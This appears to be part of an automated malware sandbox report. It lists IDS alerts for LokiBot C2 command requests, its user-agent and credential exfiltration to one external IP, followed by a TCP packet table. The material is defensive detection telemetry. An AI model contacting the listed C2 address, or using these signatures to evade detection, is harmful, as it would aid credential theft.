04/25/24-09:42:07.189244	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49756	80	192.168.2.4	45.77.223.48
04/25/24-09:42:36.181912	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49779	80	192.168.2.4	45.77.223.48
04/25/24-09:43:15.173099	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49810	80	192.168.2.4	45.77.223.48
04/25/24-09:43:07.780738	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49804	80	192.168.2.4	45.77.223.48
04/25/24-09:42:13.826993	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.4	45.77.223.48
04/25/24-09:42:43.818013	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.4	45.77.223.48
04/25/24-09:42:09.977319	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.4	45.77.223.48
04/25/24-09:42:12.423265	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.4	45.77.223.48
04/25/24-09:42:09.977319	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.4	45.77.223.48
04/25/24-09:42:12.423265	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49761	80	192.168.2.4	45.77.223.48
04/25/24-09:43:11.469231	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49807	80	192.168.2.4	45.77.223.48
04/25/24-09:42:05.989811	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.4	45.77.223.48
04/25/24-09:43:56.719260	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49838	80	192.168.2.4	45.77.223.48
04/25/24-09:43:49.906919	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49835	80	192.168.2.4	45.77.223.48
04/25/24-09:43:41.014214	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49828	80	192.168.2.4	45.77.223.48
04/25/24-09:43:31.634111	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49823	80	192.168.2.4	45.77.223.48
04/25/24-09:43:27.987761	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49820	80	192.168.2.4	45.77.223.48
04/25/24-09:43:31.634111	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49823	80	192.168.2.4	45.77.223.48
04/25/24-09:42:59.746040	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49798	80	192.168.2.4	45.77.223.48
04/25/24-09:42:25.250536	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49771	80	192.168.2.4	45.77.223.48
04/25/24-09:43:05.247702	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49802	80	192.168.2.4	45.77.223.48
04/25/24-09:43:24.107780	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49817	80	192.168.2.4	45.77.223.48
04/25/24-09:43:45.029471	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49831	80	192.168.2.4	45.77.223.48
04/25/24-09:42:25.250536	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49771	80	192.168.2.4	45.77.223.48
04/25/24-09:43:45.029471	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49831	80	192.168.2.4	45.77.223.48
04/25/24-09:42:17.524612	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.4	45.77.223.48
04/25/24-09:43:34.305329	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49825	80	192.168.2.4	45.77.223.48
04/25/24-09:42:41.192422	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49783	80	192.168.2.4	45.77.223.48
04/25/24-09:43:18.909479	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49813	80	192.168.2.4	45.77.223.48
04/25/24-09:42:01.045653	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.4	45.77.223.48
04/25/24-09:42:48.461124	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49788	80	192.168.2.4	45.77.223.48
04/25/24-09:42:32.329146	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49776	80	192.168.2.4	45.77.223.48
04/25/24-09:43:18.909479	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49813	80	192.168.2.4	45.77.223.48
04/25/24-09:42:32.329146	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49776	80	192.168.2.4	45.77.223.48
04/25/24-09:43:25.348509	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49818	80	192.168.2.4	45.77.223.48
04/25/24-09:42:54.719782	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.4	45.77.223.48
04/25/24-09:42:54.719782	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49794	80	192.168.2.4	45.77.223.48
04/25/24-09:41:57.336379	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49735	80	192.168.2.4	45.77.223.48
04/25/24-09:42:57.200454	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49796	80	192.168.2.4	45.77.223.48
04/25/24-09:43:25.348509	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49818	80	192.168.2.4	45.77.223.48
04/25/24-09:41:57.336379	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49735	80	192.168.2.4	45.77.223.48
04/25/24-09:43:21.643851	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49815	80	192.168.2.4	45.77.223.48
04/25/24-09:43:17.642261	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49812	80	192.168.2.4	45.77.223.48
04/25/24-09:42:34.955343	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.4	45.77.223.48
04/25/24-09:42:57.200454	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49796	80	192.168.2.4	45.77.223.48
04/25/24-09:42:15.058675	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49763	80	192.168.2.4	45.77.223.48
04/25/24-09:42:18.729353	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.4	45.77.223.48
04/25/24-09:43:06.504867	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49803	80	192.168.2.4	45.77.223.48
04/25/24-09:43:06.504867	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49803	80	192.168.2.4	45.77.223.48
04/25/24-09:42:31.102796	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.4	45.77.223.48
04/25/24-09:43:02.240601	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49800	80	192.168.2.4	45.77.223.48
04/25/24-09:43:08.999268	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49805	80	192.168.2.4	45.77.223.48
04/25/24-09:42:15.058675	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.4	45.77.223.48
04/25/24-09:43:12.681066	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49808	80	192.168.2.4	45.77.223.48
04/25/24-09:42:18.729353	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.4	45.77.223.48
04/25/24-09:42:38.643235	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49781	80	192.168.2.4	45.77.223.48
04/25/24-09:43:02.240601	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49800	80	192.168.2.4	45.77.223.48
04/25/24-09:41:59.827008	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.4	45.77.223.48
04/25/24-09:43:16.392996	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49811	80	192.168.2.4	45.77.223.48
04/25/24-09:42:29.915605	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.4	45.77.223.48
04/25/24-09:42:50.920365	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49791	80	192.168.2.4	45.77.223.48
04/25/24-09:42:45.849788	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.4	45.77.223.48
04/25/24-09:43:08.999268	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49805	80	192.168.2.4	45.77.223.48
04/25/24-09:42:21.173515	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.4	45.77.223.48
04/25/24-09:43:16.392996	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49811	80	192.168.2.4	45.77.223.48
04/25/24-09:42:21.173515	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49768	80	192.168.2.4	45.77.223.48
04/25/24-09:42:29.915605	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.4	45.77.223.48
04/25/24-09:43:56.719260	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49838	80	192.168.2.4	45.77.223.48
04/25/24-09:43:13.935226	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49809	80	192.168.2.4	45.77.223.48
04/25/24-09:42:28.624649	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.4	45.77.223.48
04/25/24-09:43:47.479485	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49833	80	192.168.2.4	45.77.223.48
04/25/24-09:43:07.780738	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49804	80	192.168.2.4	45.77.223.48
04/25/24-09:42:50.920365	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.4	45.77.223.48
04/25/24-09:43:47.479485	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49833	80	192.168.2.4	45.77.223.48
04/25/24-09:43:15.173099	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49810	80	192.168.2.4	45.77.223.48
04/25/24-09:42:05.989811	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.4	45.77.223.48
04/25/24-09:42:16.290446	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.4	45.77.223.48
04/25/24-09:42:03.512691	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.4	45.77.223.48
04/25/24-09:42:09.977319	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.4	45.77.223.48
04/25/24-09:42:28.624649	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.4	45.77.223.48
04/25/24-09:42:02.263836	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.4	45.77.223.48
04/25/24-09:42:12.423265	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.4	45.77.223.48
04/25/24-09:42:28.624649	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.4	45.77.223.48
04/25/24-09:42:05.989811	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.4	45.77.223.48
04/25/24-09:42:16.290446	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49764	80	192.168.2.4	45.77.223.48
04/25/24-09:42:23.788777	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.4	45.77.223.48
04/25/24-09:43:26.739380	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49819	80	192.168.2.4	45.77.223.48
04/25/24-09:43:46.244048	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49832	80	192.168.2.4	45.77.223.48
04/25/24-09:42:59.746040	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49798	80	192.168.2.4	45.77.223.48
04/25/24-09:42:49.681959	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49789	80	192.168.2.4	45.77.223.48
04/25/24-09:43:41.014214	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49828	80	192.168.2.4	45.77.223.48
04/25/24-09:42:59.746040	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49798	80	192.168.2.4	45.77.223.48
04/25/24-09:42:49.681959	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49789	80	192.168.2.4	45.77.223.48
04/25/24-09:42:33.541899	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49777	80	192.168.2.4	45.77.223.48
04/25/24-09:42:04.713098	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49754	80	192.168.2.4	45.77.223.48
04/25/24-09:42:25.250536	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49771	80	192.168.2.4	45.77.223.48
04/25/24-09:43:34.305329	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49825	80	192.168.2.4	45.77.223.48
04/25/24-09:43:05.247702	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49802	80	192.168.2.4	45.77.223.48
04/25/24-09:42:04.713098	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49754	80	192.168.2.4	45.77.223.48
04/25/24-09:42:41.192422	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49783	80	192.168.2.4	45.77.223.48
04/25/24-09:42:41.192422	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49783	80	192.168.2.4	45.77.223.48
04/25/24-09:43:34.305329	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49825	80	192.168.2.4	45.77.223.48
04/25/24-09:43:45.029471	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49831	80	192.168.2.4	45.77.223.48
04/25/24-09:43:05.247702	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49802	80	192.168.2.4	45.77.223.48
04/25/24-09:42:11.222525	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.4	45.77.223.48
04/25/24-09:43:42.568421	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49829	80	192.168.2.4	45.77.223.48
04/25/24-09:43:10.231973	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49806	80	192.168.2.4	45.77.223.48
04/25/24-09:42:39.921949	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49782	80	192.168.2.4	45.77.223.48
04/25/24-09:41:58.700835	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49741	80	192.168.2.4	45.77.223.48
04/25/24-09:42:39.921949	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.4	45.77.223.48
04/25/24-09:43:18.909479	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49813	80	192.168.2.4	45.77.223.48
04/25/24-09:41:58.700835	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49741	80	192.168.2.4	45.77.223.48
04/25/24-09:43:29.212593	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49821	80	192.168.2.4	45.77.223.48
04/25/24-09:42:53.510184	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.4	45.77.223.48
04/25/24-09:43:00.985732	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49799	80	192.168.2.4	45.77.223.48
04/25/24-09:43:00.985732	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49799	80	192.168.2.4	45.77.223.48
04/25/24-09:43:17.642261	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49812	80	192.168.2.4	45.77.223.48
04/25/24-09:43:29.212593	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49821	80	192.168.2.4	45.77.223.48
04/25/24-09:42:57.200454	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49796	80	192.168.2.4	45.77.223.48
04/25/24-09:43:21.643851	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49815	80	192.168.2.4	45.77.223.48
04/25/24-09:43:17.642261	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49812	80	192.168.2.4	45.77.223.48
04/25/24-09:42:47.218743	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49787	80	192.168.2.4	45.77.223.48
04/25/24-09:43:10.231973	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49806	80	192.168.2.4	45.77.223.48
04/25/24-09:43:06.504867	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49803	80	192.168.2.4	45.77.223.48
04/25/24-09:43:02.240601	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49800	80	192.168.2.4	45.77.223.48
04/25/24-09:42:29.915605	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.4	45.77.223.48
04/25/24-09:41:59.827008	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.4	45.77.223.48
04/25/24-09:42:45.849788	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.4	45.77.223.48
04/25/24-09:43:41.014214	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49828	80	192.168.2.4	45.77.223.48
04/25/24-09:42:21.173515	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.4	45.77.223.48
04/25/24-09:42:37.405098	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.4	45.77.223.48
04/25/24-09:42:45.849788	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49786	80	192.168.2.4	45.77.223.48
04/25/24-09:42:52.171897	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.4	45.77.223.48
04/25/24-09:43:48.680283	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49834	80	192.168.2.4	45.77.223.48
04/25/24-09:41:59.827008	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.4	45.77.223.48
04/25/24-09:43:48.680283	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49834	80	192.168.2.4	45.77.223.48
04/25/24-09:42:52.171897	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49792	80	192.168.2.4	45.77.223.48
04/25/24-09:43:13.935226	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49809	80	192.168.2.4	45.77.223.48
04/25/24-09:43:56.719260	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49838	80	192.168.2.4	45.77.223.48
04/25/24-09:43:30.405107	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49822	80	192.168.2.4	45.77.223.48
04/25/24-09:43:13.935226	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49809	80	192.168.2.4	45.77.223.48
04/25/24-09:43:21.643851	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49815	80	192.168.2.4	45.77.223.48

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 09:41:57.201052904 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:57.334089041 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:57.334279060 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:57.336379051 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:57.470284939 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:57.470454931 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:57.601454020 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.420763016 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.420820951 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.420866013 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.420902967 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.421011925 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.421053886 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.421130896 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.421169996 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.421236038 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.421274900 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.429910898 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.429971933 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.430213928 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.430226088 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.430257082 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.430273056 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.430366993 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.430408955 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.430546045 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.430587053 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.555470943 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.555486917 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.555630922 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.555630922 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.571748972 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.698635101 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.698813915 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.700834990 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.827771902 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:58.827822924 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:58.954658031 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.637592077 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.637612104 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.637623072 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.637634039 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.637670994 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.637700081 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.637700081 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.645780087 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.645824909 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.645935059 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.645946980 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.645972967 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.645986080 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.646034002 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.646070957 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.646275997 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.646289110 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.646317959 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.646330118 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.695235014 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.764703989 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.764750004 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.764750957 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.764790058 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.824727058 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.824805975 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.827008009 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:41:59.956912041 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:41:59.956965923 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.086473942 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.768182993 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.768244982 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.768290997 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.768321991 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.768346071 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.768388987 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.768455029 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.768543005 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.768579960 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.768670082 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.776303053 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.776340961 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.776660919 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.776696920 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.777019024 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.777053118 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.777092934 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.777179003 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.777260065 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.777304888 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.897905111 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.897979975 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:00.897984028 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.898031950 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:00.916306973 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:01.043421030 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:01.043497086 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:01.045653105 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:01.172842979 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:01.173758030 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:01.300787926 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:01.994920969 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:01.995078087 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:01.995270014 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:01.995348930 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:01.995420933 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:01.995424032 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:01.995471001 CEST	49747	80	192.168.2.4	45.77.223.48
